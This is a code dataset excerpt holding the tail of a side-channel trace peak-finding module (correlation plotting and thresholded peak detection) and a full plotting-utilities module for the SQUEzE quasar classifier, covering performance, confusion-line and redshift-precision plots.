detrending_filter(\n correlation, (int(self.trace_container.calculated_width))/correlation_step_size)\n if do_plots:\n curve = hv.Curve((range(0, len(filtered_correlation)), np.array(\n filtered_correlation)), label=\"filtered correlation\")\n curve = curve.options(xlabel='Sample', ylabel='correlation')\n curve.opts(width=900, height=600)\n hv.extension('bokeh')\n # hv.save(curve,'test.svg',fmt='',backend='bokeh')\n p = hv.render(curve, backend='bokeh')\n show(p)\n peak_idx_list, peak_end_idx_list = self.get_peaks_above_threshold(\n filtered_correlation, correlation_step_size)\n\n return peak_idx_list\n\n def get_peaks_above_threshold(self, correlation, correlation_step_size, threshold=0):\n correlation_removed_peaks = np.copy(correlation)\n window_size = int(self.trace_container.calculated_width) * \\\n self.trace_container.no_similar_rounds\n\n peak_idx = []\n peak_end_idx = []\n num_peaks = self.trace_container.nr_hidden_cos\n\n for i in range(num_peaks):\n max_idx = np.argmax(correlation_removed_peaks)\n if correlation[max_idx] < threshold:\n break\n peak_idx.append(max_idx*correlation_step_size)\n peak_end_idx.append(max_idx*correlation_step_size+window_size)\n for i in range(max(0, max_idx-int(window_size/correlation_step_size*0.7)), min(len(correlation_removed_peaks), max_idx + int(window_size/correlation_step_size*0.7))):\n correlation_removed_peaks[i] = 0\n\n return np.array(peak_idx), np.array(peak_end_idx)\n","repo_name":"FAU-LS12-RC/Finding-COs-in-Side-Channel-Traces","sub_path":"src/sample_finder.py","file_name":"sample_finder.py","file_ext":"py","file_size_in_byte":22428,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} 
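The sample_finder.py record above rates a candidate CO width by counting equidistant sub-peaks at multiples of that width behind (and before) each main peak of the detrended similarity trace. Below is a minimal, self-contained sketch of that counting step only; the name count_equidistant_sub_peaks, the similarity argument, and the toy trace are hypothetical stand-ins chosen for this illustration, not taken from the repository.

import numpy as np

def count_equidistant_sub_peaks(similarity, main_peak_idx, width, max_peaks=9, delta=1):
    # Count consecutive sub-peaks at main_peak_idx + k*width (k = 1..max_peaks).
    # A sub-peak must rise above its neighbours +/- delta samples away and must
    # not exceed the main peak itself (mirroring the is_a_peak check above).
    count = 0
    for k in range(1, max_peaks + 1):
        idx = main_peak_idx + k * width
        if idx + delta >= len(similarity):
            break  # ran past the end of the trace
        if not (similarity[idx] > similarity[idx + delta]
                and similarity[idx] > similarity[idx - delta]
                and similarity[idx] <= similarity[main_peak_idx]):
            break  # the comb of round peaks ends here
        count += 1
    return count

# A comb of peaks spaced `width` apart saturates the count; flat noise breaks
# out of the loop almost immediately.
width = 10
trace = np.zeros(200)
trace[20::width] = 1.0  # equidistant round-like peaks from index 20 on
trace[20] = 1.5         # main peak slightly higher than the sub-peaks
print(count_equidistant_sub_peaks(trace, 20, width))  # prints 9

find_peaks in the record stops collecting main peaks once this count falls below min_number_of_sub_peaks, which is what separates genuine cryptographic operations from background similarity.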
+{"seq_id":"7956586219","text":"\"\"\"\n SQUEzE\n ======\n\n This file provides useful functions to plot the performance of SQUEzE\n \"\"\"\n__author__ = \"Ignasi Perez-Rafols (iprafols@gmail.com)\"\n\nimport re\nimport os\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nfrom matplotlib.collections import LineCollection\nimport numpy as np\nimport pandas as pd\n\nfrom squeze.utils import deserialize, load_json\n\nCOLOR_LIST = [\n '#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2'\n]\n\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\nos.environ[\"THIS_DIR\"] = THIS_DIR\nSQUEZE = THIS_DIR.split(\"py/squeze\")[0]\nos.environ[\"SQUEZE\"] = SQUEZE\nLINES = deserialize(\n load_json(os.path.expandvars(\"$SQUEZE/data/default_lines.json\")))\n\n\ndef compare_performances_plot(stats_dict,\n names,\n labels,\n control_name,\n plot_f1=False,\n add_purity=False,\n add_completeness=False,\n sharey=True):\n \"\"\" Plot the f1-score as a function of magnitude of multiple runs of SQUEzE\n to compare them.\n\n Arguments\n ---------\n stats_dict: dictionary\n A dictionary with the statistics as a function of magnitude. Keys are the\n names of the different runs, values are the output of functon\n compute_stats_vs_mag (see stats_utils.py)\n\n names: list of str or str\n The keys in stats_dict that should be plotted. If a string, only one key is\n passed\n\n labels: list of str or str\n Labels for the runs. Must have the same ordering as names.\n\n control_name: str\n The name of the baseline run others are compared to. Must be a key in\n stats_dict.\n\n plot_f1: bool - Default: False\n If True then plot the overall f1-score along with the comparison. Otherwise\n just plot the comparison\n\n add_purity: bool - Default: False\n If True, then add a dashed line with the purity values\n\n add_completeness: bool - Default: False\n If True, then add a dotted line with the completeness values\n\n sharey: bool - Default: True\n If True, the plots at low-z and high-z will share the y axis\n\n Return\n ------\n fig: matplotlib.pyplot.figure\n The figure with the plot\n \"\"\"\n if not isinstance(names, list):\n names = [names]\n labels = [labels]\n\n if len(names) > len(COLOR_LIST):\n print(\"Too many items to plot. 
Either add more colors to the list or \"\n \"else remove some items to plot\")\n return\n\n # plot options\n if plot_f1:\n figsize = (10, 8)\n else:\n figsize = (10, 5)\n fontsize = 14\n labelsize = 13\n ticksize = 8\n tickwidth = 2\n pad = 6\n ncols = 2\n if plot_f1:\n nrows = 3\n height_ratios = [10, 5, 1]\n else:\n nrows = 2\n height_ratios = [10, 1]\n fig = plt.figure(figsize=figsize)\n gs = fig.add_gridspec(nrows=nrows, ncols=ncols, height_ratios=height_ratios)\n gs.update(wspace=0.25,\n hspace=0.4,\n bottom=0.15,\n left=0.1,\n right=0.95,\n top=0.9)\n if plot_f1:\n ax_lowz_f1 = fig.add_subplot(gs[0, 0])\n if sharey:\n ax_highz_f1 = fig.add_subplot(gs[0, 1], sharey=ax_lowz_f1)\n else:\n ax_highz_f1 = fig.add_subplot(gs[0, 1])\n lns_lowz_f1 = []\n lns_highz_f1 = []\n ax_lowz_diff = fig.add_subplot(gs[-2, 0])\n if sharey:\n ax_highz_diff = fig.add_subplot(gs[-2, 1], sharey=ax_lowz_diff)\n else:\n ax_highz_diff = fig.add_subplot(gs[-2, 1])\n lns_lowz_diff = []\n lns_highz_diff = []\n ax_legend = fig.add_subplot(gs[-1, :])\n\n for index, (name, label) in enumerate(zip(names, labels)):\n if plot_f1:\n lns_lowz_f1 += ax_lowz_f1.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"f1_score_vs_mag\")[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"solid\")\n lns_highz_f1 += ax_highz_f1.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"f1_score_vs_mag\")[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"solid\")\n control = stats_dict.get(control_name).get(\"f1_score_vs_mag\")\n lns_lowz_diff += ax_lowz_diff.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"f1_score_vs_mag\")[:, 0] - control[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"solid\")\n lns_highz_diff += ax_highz_diff.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"f1_score_vs_mag\")[:, 1] - control[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"solid\")\n\n if add_purity:\n if plot_f1:\n ax_lowz_f1.plot(stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"purity_vs_mag\")[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dashed\",\n alpha=0.5)\n ax_highz_f1.plot(stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"purity_vs_mag\")[:,\n 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dashed\",\n alpha=0.5)\n control = stats_dict.get(control_name).get(\"purity_vs_mag\")\n ax_lowz_diff.plot(stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"purity_vs_mag\")[:, 0] -\n control[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dashed\")\n ax_highz_diff.plot(stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"purity_vs_mag\")[:, 1] -\n control[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dashed\",\n alpha=0.5)\n\n if add_completeness:\n if plot_f1:\n ax_lowz_f1.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"completeness_vs_mag\")[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dotted\",\n alpha=0.5)\n ax_highz_f1.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"completeness_vs_mag\")[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dotted\",\n alpha=0.5)\n control = stats_dict.get(control_name).get(\"completeness_vs_mag\")\n ax_lowz_diff.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"completeness_vs_mag\")[:, 0] -\n control[:, 0],\n 
label=label,\n color=COLOR_LIST[index],\n linestyle=\"dotted\",\n alpha=0.5)\n ax_highz_diff.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"completeness_vs_mag\")[:, 1] -\n control[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dotted\",\n alpha=0.5)\n\n # axis settings, labels\n xlim = (min(stats_dict.get(names[0]).get(\"mag_cuts\")),\n max(stats_dict.get(names[0]).get(\"mag_cuts\")))\n if plot_f1:\n ax_lowz_f1.set_title(r\"$z < 2.1$\", fontsize=fontsize)\n ax_lowz_f1.set_ylabel(r\"$f_{1}$\", fontsize=fontsize)\n ax_lowz_f1.yaxis.set_major_locator(MultipleLocator(0.05))\n ax_lowz_f1.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n ax_lowz_f1.set_xlim(xlim)\n\n ax_highz_f1.set_title(r\"$z \\geq 2.1$\", fontsize=fontsize)\n ax_highz_f1.yaxis.set_major_locator(MultipleLocator(0.05))\n ax_highz_f1.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n ax_highz_f1.set_xlim(xlim)\n\n else:\n ax_lowz_diff.set_title(r\"$z < 2.1$\", fontsize=fontsize)\n ax_highz_diff.set_title(r\"$z \\geq 2.1$\", fontsize=fontsize)\n\n ax_lowz_diff.set_ylabel(r\"$f_{1} - f_{1} ({\\rm fid})$\", fontsize=fontsize)\n ax_lowz_diff.set_xlabel(\"r mag cut\", fontsize=fontsize)\n ax_lowz_diff.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n ax_lowz_diff.set_xlim(xlim)\n\n ax_highz_diff.set_xlabel(\"r mag cut\", fontsize=fontsize)\n ax_highz_diff.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n ax_highz_diff.set_xlim(xlim)\n\n # legend\n labels = [lns.get_label() for lns in lns_highz_diff]\n ax_legend.legend(lns_highz_diff, labels, ncol=3, loc=9, fontsize=fontsize)\n ax_legend.axis('off')\n\n\ndef confusion_line_plots(df,\n rmag_bins,\n prob_low=0.0,\n prob_high=0.0,\n lines=None,\n exclude_line_pairs=None,\n delta_z=0.15):\n \"\"\" Make a confusion line plot\n\n Plot only items with probability above a certain threshold.\n High-z quasars (z>=2.1) can be treated differently from low-z quasars.\n\n Arguments\n ---------\n df: pd.DataFrame\n The dataframe with the classifications\n\n rmag_bins: array of float\n Limiting magnitudes to split the plot. len(rmag_bins) -1 plot are\n created\n\n prob_low: float - Default: 0.0\n Probability threshold for low-z quasars (z < 2.1)\n\n prob_high: float - Default: 0.0\n Probability threshold for high-z quasars (z >= 2.1)\n\n lines: pd.DataFrame or None - Default: None\n Dataframe with the confusion lines to plot. It must contain column \"WAVE\".\n Indexs should be the names of the lines. 
Ignored if None\n\n exclude_line_pairs: list of (str, str) or None - Default: None\n List containing confusion lines that are not plotted.\n\n delta_z: float - Default: 0.15\n Maximum redshift error for correctly classified objects\n \"\"\"\n if exclude_line_pairs is None:\n exclude_line_pairs = []\n\n ncols = 2\n if len(rmag_bins) % 2 == 0:\n nrows = int((len(rmag_bins) - 1) // 2) + 1\n else:\n nrows = int((len(rmag_bins) - 1) // 2)\n\n # plot options\n figsize = (8 * nrows, 8 * ncols)\n fontsize = 16\n labelsize = 14\n ticksize = 8\n tickwidth = 2\n markersize = 20\n markersize2 = 30\n fig = plt.figure(figsize=figsize)\n gs = fig.add_gridspec(nrows=nrows, ncols=ncols)\n gs.update(wspace=0., hspace=0.2, bottom=0.15, left=0.1, right=0.95, top=0.9)\n\n row_index = 0\n col_index = 0\n for rmag_min, rmag_max in zip(rmag_bins[:-1], rmag_bins[1:]):\n\n aux = df[(df[\"R_MAG\"] > rmag_min) & (df[\"R_MAG\"] <= rmag_max)]\n ax = fig.add_subplot(gs[row_index, col_index])\n ax.set_aspect('equal')\n\n ax.scatter(aux[(aux[\"IS_CORRECT\"])][\"Z_TRUE\"],\n aux[aux[\"IS_CORRECT\"]][\"Z_TRY\"],\n c='k',\n label=\"correct\",\n zorder=4,\n s=markersize)\n ax.scatter(\n aux[(aux[\"CLASS_PERSON\"] == 3) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRUE\"],\n aux[(aux[\"CLASS_PERSON\"] == 3) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRY\"],\n label=\"qso\",\n zorder=1,\n marker=\"v\",\n s=markersize)\n ax.scatter(\n aux[(aux[\"CLASS_PERSON\"] == 4) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRUE\"],\n aux[(aux[\"CLASS_PERSON\"] == 4) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRY\"],\n label=\"galaxy\",\n zorder=2,\n marker=\"^\",\n s=markersize)\n ax.scatter(\n aux[(aux[\"CLASS_PERSON\"] == 1) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRUE\"],\n aux[(aux[\"CLASS_PERSON\"] == 1) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRY\"],\n label=\"star\",\n zorder=3,\n marker=\"s\",\n s=markersize2)\n\n if lines is not None:\n z = np.arange(0, 5, 0.5)\n for line1 in lines.index:\n for line2 in lines.index:\n if line1 == line2 or (line1, line2) in exclude_line_pairs:\n continue\n z_line1_as_line2 = (\n LINES[\"WAVE\"][line1] / LINES[\"WAVE\"][line2] *\n (1 + z) - 1)\n ax.plot(z_line1_as_line2,\n z,\n label=f\"real: {line1}; assumed: {line2}\")\n\n ax.legend(numpoints=1, fontsize=labelsize, loc='lower right')\n\n xlim = np.array((0, 4))\n ax.fill_between([0.0, 2.1], [0.0, 0.0], [2.1, 2.1],\n color=\"k\",\n alpha=0.1,\n zorder=0)\n ax.fill_between([2.1, xlim[1]], [2.1, 2.1], [xlim[1], xlim[1]],\n color=\"k\",\n alpha=0.1,\n zorder=0)\n ax.plot(xlim, xlim, \"r-\")\n ax.fill_between(xlim,\n xlim + delta_z,\n xlim - delta_z,\n color=\"r\",\n alpha=0.2,\n zorder=0)\n ax.set_xlim(xlim)\n ax.set_ylim(xlim)\n ax.set_xlabel(r\"$z_{\\rm true}$\", fontsize=fontsize)\n ax.set_ylabel(r\"$z_{\\rm try}$\", fontsize=fontsize)\n ax.set_title(fr\"${rmag_min:.1f} < r \\leq {rmag_max:.1f}$\",\n fontsize=fontsize)\n ax.tick_params(labelsize=labelsize, size=ticksize, width=tickwidth)\n\n col_index += 1\n if col_index == ncols:\n col_index = 0\n row_index += 
1\n\n\ndef multiline(x_coordinates,\n              y_coordinates,\n              color_coordinates,\n              ax=None,\n              **kwargs):\n    \"\"\"Plot lines with different colorings\n\n    Arguments\n    ---------\n    x_coordinates: 2d array of float\n        Array containing x coordinates for each of the lines\n\n    y_coordinates: 2d array of float\n        Array containing y coordinates for each of the lines\n\n    color_coordinates: 1d array of float\n        Array containing numbers mapped to colormap\n\n    ax: plt.Axes or None - default: None\n        Axes to plot on. If None, then create new axes\n\n    **kwargs\n        Keyword arguments passed to LineCollection\n\n    Notes\n    -----\n    len(x_coordinates) == len(y_coordinates) == len(color_coordinates) is the\n    number of line segments\n\n    len(x_coordinates[index]) == len(y_coordinates[index]) is the number of\n    points for each line (indexed by index)\n\n    Return\n    ------\n    line_collection: LineCollection\n        LineCollection instance.\n    \"\"\"\n\n    # find axes\n    ax = plt.gca() if ax is None else ax\n\n    # create LineCollection\n    segments = [\n        np.column_stack([x, y]) for x, y in zip(x_coordinates, y_coordinates)\n    ]\n    line_collection = LineCollection(segments, **kwargs)\n\n    # set coloring of line segments\n    line_collection.set_array(np.asarray(color_coordinates))\n\n    # add lines to axes and rescale\n    # Note: adding a collection doesn't autoscale xlim/ylim\n    ax.add_collection(line_collection)\n    ax.autoscale()\n\n    return line_collection\n\n\ndef plot_peaks(spectra,\n               peak_finders,\n               labels,\n               markers,\n               offset=1.0,\n               ontop=True,\n               plot_lines=True,\n               emission_lines=LINES,\n               add_legend=False):\n    \"\"\" Plot the peaks found by one or more peak finder instances\n    All peak finders accepted by SQUEzE can be passed\n\n    Arguments\n    ---------\n    spectra: Spectra\n        An instance of Spectra with the spectra to plot\n\n    peak_finders: list\n        A list of valid peak finder instances.\n\n    labels: list of str\n        Labels of the different peak finders. Must have same length as peak_finders\n\n    markers: list of str\n        Matplotlib marker strings for the different peak finders\n\n    offset: float or list of float - Default: 1.0\n        Offset of the peak markers. Offset is computed by multiplying the flux\n        by the value in offset. If a float, use the same value for all peak\n        finders. If a list, must have same length as peak_finders. The peaks of each\n        peak finder will be offset using the respective offset\n\n    ontop: bool - Default: True\n        If True, draw the peak markers at a fixed height above the spectrum\n        instead of at the (offset) peak flux\n\n    plot_lines: bool - Default: True\n        If True, overplot the position of the emission lines in the spectra of\n        quasars and galaxies\n\n    emission_lines: pd.DataFrame - Default: LINES\n        Emission lines to plot. Format is a dataframe with the field \"WAVE\" with\n        the rest-frame wavelength of the lines.\n\n    add_legend: boolean - Default: False\n        If True, then plot the plot legend\n    \"\"\"\n    if len(peak_finders) > len(COLOR_LIST):\n        print(\"Too many items to plot. 
Either add more colors to the list or \"\n \"else remove some items to plot\")\n return\n assert len(peak_finders) == len(labels)\n assert len(peak_finders) == len(markers)\n assert isinstance(offset, float) or len(peak_finders) == len(offset)\n if isinstance(offset, float):\n offset = [offset] * len(peak_finders)\n\n num_spectra = spectra.size()\n\n # plot options\n fontsize = 14\n labelsize = 12\n ticksize = 8\n tickwidth = 2\n pad = 6\n ncols = 2\n nrows = num_spectra // 2\n if num_spectra % 2 > 0:\n nrows += 1\n figsize = (13, 5 * nrows)\n fig = plt.figure(figsize=figsize)\n if add_legend:\n gs = fig.add_gridspec(nrows=nrows + 1, ncols=ncols)\n else:\n gs = fig.add_gridspec(nrows=nrows, ncols=ncols)\n gs.update(wspace=0.25,\n hspace=0.4,\n bottom=0.15,\n left=0.1,\n right=0.95,\n top=0.9)\n axes = [\n fig.add_subplot(gs[index_row, index_col])\n for index_row in range(nrows)\n for index_col in range(ncols)\n ]\n if add_legend:\n ax_legend = fig.add_subplot(gs[-1, :])\n\n lines = []\n for index, (ax, spectrum) in enumerate(zip(axes, spectra.spectra_list)):\n specid = spectrum.metadata_by_key(\"SPECID\")\n rmag = spectrum.metadata_by_key(\"R_MAG\")\n z_true = spectrum.metadata_by_key(\"Z_TRUE\")\n class_person = spectrum.metadata_by_key(\"CLASS_PERSON\")\n\n if index == 0:\n lines += ax.plot(\n spectrum.wave,\n spectrum.flux,\n color=\"k\",\n linestyle=\"-\",\n label=\"spectrum\"\n )\n ax.errorbar(\n spectrum.wave,\n spectrum.flux,\n yerr=1/np.sqrt(spectrum.ivar),\n color=\"k\",\n linestyle=\"-\")\n ax.set_title(f\"SPECID: {specid}, R_MAG: {rmag}, Z_TRUE: {z_true:.2f}\",\n fontsize=labelsize)\n\n for index_pf, peak_finder in enumerate(peak_finders):\n peaks, _ = peak_finder.find_peaks(spectrum)\n if index == 0:\n if ontop:\n ymax = np.max(spectrum.flux)\n lines += ax.plot(spectrum.wave[peaks],\n [ymax * offset[index_pf]] *\n spectrum.wave[peaks].size,\n color=COLOR_LIST[index_pf],\n linestyle='',\n marker=markers[index_pf],\n label=f\"{labels[index_pf]} peaks\")\n else:\n lines += ax.plot(spectrum.wave[peaks],\n spectrum.flux[peaks] * offset[index_pf],\n color=COLOR_LIST[index_pf],\n linestyle='',\n marker=markers[index_pf],\n label=f\"{labels[index_pf]} peaks\")\n else:\n if ontop:\n ymax = np.max(spectrum.flux)\n ax.plot(spectrum.wave[peaks], [ymax * offset[index_pf]] *\n spectrum.wave[peaks].size,\n color=COLOR_LIST[index_pf],\n linestyle='',\n marker=markers[index_pf],\n label=f\"{labels[index_pf]} peaks\")\n else:\n ax.plot(spectrum.wave[peaks],\n spectrum.flux[peaks] * offset[index_pf],\n color=COLOR_LIST[index_pf],\n linestyle='',\n marker=markers[index_pf])\n\n if plot_lines and class_person in [3, 4]:\n ylim = ax.get_ylim()\n xlim = ax.get_xlim()\n emission_lines_observed_frame = emission_lines[\"WAVE\"].values * (\n 1 + z_true)\n w = np.where((xlim[0] < emission_lines_observed_frame) &\n (emission_lines_observed_frame < xlim[1]))\n ax.vlines(emission_lines_observed_frame[w],\n ylim[0],\n ylim[1],\n colors=\"k\",\n linestyle='--',\n alpha=0.5)\n ax.set_ylim(ylim)\n\n # axis settings, labels\n for ax in axes:\n ax.set_ylabel(r\"flux\", fontsize=fontsize)\n ax.set_xlabel(r\"wavelength [${\\rm \\AA}$]\", fontsize=fontsize)\n ax.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n\n # legend\n if add_legend:\n labels = [lns.get_label() for lns in lines]\n ax_legend.legend(lines, labels, ncol=3, loc=9, fontsize=fontsize)\n ax_legend.axis('off')\n\n\ndef 
plot_peakfinder_stats_vs_magnitude(mag_cuts,\n significance_cut_vs_mag,\n completeness_vs_mag,\n num_spectra_vs_mag,\n num_spectra_qso_vs_mag,\n num_entries_vs_mag,\n num_correct_entries_vs_mag,\n significance_cut_lim=None,\n completeness_lim=None,\n title=None):\n \"\"\"\n Plot Peak Finder statistics as a function of magnitude cuts.\n\n Statistics plotted are the completeness after peak finder and the number\n of trial redshifts per spectrum (all trial redshifts as solid lines and\n correct trial redshfit as dashed lines).\n\n Format of the arrays should be the same as the outputs from\n compute_peak_finder_completeness_vs_mag (see stats_utils.py)\n\n Arguments\n ---------\n mag_cuts: list of float\n The used magnitude cuts\n\n significance_cut: 1d array of float\n The significance cuts used to compute the completeness for each magnitude cut\n\n completeness_vs_mag: 2d array of float\n Completeness considering the entries that meet the each significance and magnitude cuts\n\n num_spectra_vs_mag: 1d array of int\n Number of spectra as for each magnitude cut\n\n num_entries_vs_mag: 2d array of float\n The number of entries in the dataframe that meet the significance and magnitude cuts\n\n num_correct_entries_vs_mag: 2d array of float\n The number of entries in the dataframe that meet the significance and magnitude cuts\n and corresponds to quasars with the correct redshift\n\n significance_cut_lim: (float, float) or None - Default: None\n Significance cut range to show in the plot. If None, use the automatic choice\n\n completeness_lim: (float, float) or None - Default: None\n Completeness range to show in the plot. If None, use the automatic choice\n\n title: str or None - Default: None\n If not None, add this as plot title\n \"\"\"\n\n fontsize = 18\n labelsize = 14\n ticksize = 8\n tickwitdh = 2\n figsize = (12, 5)\n fig = plt.figure(figsize=figsize)\n gs = fig.add_gridspec(1, 3, hspace=0., wspace=0.5, width_ratios=[10, 10, 1])\n\n ax = fig.add_subplot(gs[0])\n ax2 = fig.add_subplot(gs[1])\n ax3 = fig.add_subplot(gs[2])\n\n cmap = \"viridis\"\n\n line_collection = multiline(significance_cut_vs_mag,\n completeness_vs_mag,\n mag_cuts,\n ax=ax,\n cmap=cmap)\n multiline(significance_cut_vs_mag,\n num_entries_vs_mag / num_spectra_vs_mag,\n mag_cuts,\n ax=ax2,\n cmap=cmap)\n multiline(significance_cut_vs_mag,\n num_correct_entries_vs_mag /\n num_spectra_qso_vs_mag,\n mag_cuts,\n ax=ax2,\n cmap=cmap,\n linestyle=\"dashed\")\n\n ax.tick_params(labelsize=labelsize, size=ticksize, width=tickwitdh)\n ax.set_xlabel(\"min. peak significance\", fontsize=fontsize)\n ax.set_ylabel(\"max. completeness\", fontsize=fontsize)\n\n ax2.set_ylabel(\"num. trial redshift/spectrum\", fontsize=fontsize)\n ax2.set_xlabel(\"min. peak significance\", fontsize=fontsize)\n ax2.tick_params(labelsize=labelsize, size=ticksize, width=tickwitdh)\n\n fig.colorbar(line_collection, cax=ax3, shrink=0.8)\n ax3.yaxis.set_label_position('left')\n ax3.set_ylabel(\"magnitude cut\", fontsize=fontsize)\n ax3.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwitdh,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n\n if completeness_lim is not None:\n ax.set_ylim(completeness_lim)\n if significance_cut_lim is not None:\n ax.set_xlim(significance_cut_lim)\n ax2.set_xlim(significance_cut_lim)\n if title is not None:\n fig.suptitle(title, fontsize=fontsize)\n\n\ndef redshift_precision_histogram(df, mag_bins, title=None,\n bins=np.arange(-2e4, 2e4, 750)):\n \"\"\" Plot the redshift precision histogram. 
Also print a table summarising\n    the precision.\n\n    Arguments\n    ---------\n    df: pd.DataFrame\n        The catalogue\n\n    mag_bins: list of float\n        List of the magnitude limits of each bin. For example [18, 20, 22]\n        has two bins: from 18 to 20 and from 20 to 22.\n\n    bins: array of float - Default: np.arange(-2e4, 2e4, 750)\n        These are the histogram bins.\n\n    title: str or None - Default: None\n        If not None, then add title as the plot title\n    \"\"\"\n    # plot options\n    figsize = (5, 5)\n    fontsize = 16\n    labelsize = 12\n    ticksize = 8\n    tickwidth = 2\n    pad = 6\n    ncols = 1\n    nrows = 1\n    fig = plt.figure(figsize=figsize)\n    gs = fig.add_gridspec(nrows=nrows, ncols=ncols)\n    gs.update(wspace=0., hspace=0.2, bottom=0.15, left=0.1, right=0.95, top=0.9)\n    ax = fig.add_subplot(gs[0])\n\n    redshift_precision = {\n        \"mag bin\": [],\n        r\"$\\overline{\\Delta v}$ [km/s]\": [],\n        r\"$\\sigma_{\\Delta v}$ [km/s]\": [],\n        r\"100$\\sigma_{\\rm NMAD}$\": [],\n        \"$N$\": [],\n    }\n\n    if \"DELTA_V\" not in df.columns:\n        df[\"DELTA_V\"] = df[\"DELTA_Z\"] / (1 + df[\"Z_TRUE\"]) * 3e5\n\n    for rmag_min, rmag_max in zip(mag_bins[:-1], mag_bins[1:]):\n\n        aux = df[(df[\"R_MAG\"] > rmag_min) & (df[\"R_MAG\"] <= rmag_max) &\n                 (df[\"IS_CORRECT\"])]\n\n        ax.hist(aux[\"DELTA_V\"],\n                bins=bins,\n                label=fr\"${rmag_min:.1f} < r \\leq {rmag_max:.1f}$\",\n                histtype=\"step\",\n                density=True,\n                )\n\n        redshift_precision[\"mag bin\"].append(\n            fr\"${rmag_min:.1f} < r \\leq {rmag_max:.1f}$\")\n        redshift_precision[r\"$\\overline{\\Delta v}$ [km/s]\"].append(\n            aux['DELTA_V'].mean())\n        redshift_precision[r\"$\\sigma_{\\Delta v}$ [km/s]\"].append(\n            aux['DELTA_V'].std())\n        redshift_precision[r\"100$\\sigma_{\\rm NMAD}$\"].append(\n            np.fabs(aux['DELTA_V']).median()/3e5*1.48*100)\n        redshift_precision[\"$N$\"].append(\n            aux.shape[0])\n\n    ax.set_xlabel(r\"$\\Delta v$ [km/s]\", fontsize=fontsize)\n    ax.set_ylabel(r\"normalized counts\", fontsize=fontsize)\n    if title is not None:\n        ax.set_title(title, fontsize=fontsize)\n    ax.tick_params(labelsize=labelsize, pad=pad, size=ticksize, width=tickwidth)\n\n    ax.legend(numpoints=1, fontsize=labelsize, loc=\"upper left\")\n\n    redshift_precision_df = pd.DataFrame(redshift_precision)\n    latex = redshift_precision_df.to_latex(\n        index=False,\n        escape=False,\n        column_format=\"c\" * redshift_precision_df.shape[1],\n        float_format='{:,.2f}'.format,\n    )\n    latex = re.sub(r\"cline{\\d-\\d}\", r\"midrule\", latex)\n    print(latex)\n    return redshift_precision_df\n","repo_name":"iprafols/SQUEzE","sub_path":"py/squeze/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":31336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
